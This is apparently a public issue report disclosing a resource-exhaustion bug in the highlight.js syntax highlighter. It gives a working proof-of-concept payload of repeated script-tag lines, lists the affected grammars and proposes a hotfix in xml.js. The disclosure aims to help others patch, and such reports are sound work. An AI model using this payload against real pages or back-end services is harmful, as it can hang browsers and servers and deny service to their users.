highlight.js
Resource exhaustion
Describe the issue/behavior that seems buggy
While testing our code, we found that we could make our 'markdown editor' crash. After some additional research, I found that the highlighting caused it.
I also decided to test the PoC on the demo page of highlight.js, and there it also uses a lot of resources. The browser will eventually show the 'This page isn't responding' pop-up.
Sample Code or Instructions to Reproduce
<body>
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
</body>
Expected behavior
Page doesn't crash.
Additional context
I submitted this to [email protected], but didn't get any response. This can be used to impact the availability of a webpage.
If people use this package in their back-ends (NodeJS, PDF generators, ...), this will cause load on their infrastructure, eventually resulting in a denial of service.
Which grammar choice results in the bad behavior?
The original payload won't trigger it for all grammars. I'll send an email to [email protected] with the list of vulnerable grammars and a minimal reproduction PoC that includes another payload that will trigger the vulnerability for a longer list.
Since it's been months now with no reply from the maintainers, here or via email, I'm publicly disclosing so that others can patch if needed.
Affected grammars:
- django
- dust
- xml
- hbs
- mojolicious
- parser3
- qml
- twig
- xquery
The vulnerability can be hotfixed by removing the 'xml' sublanguage from <script> tags in src/languages/xml.js (line 183).
FYI @poeck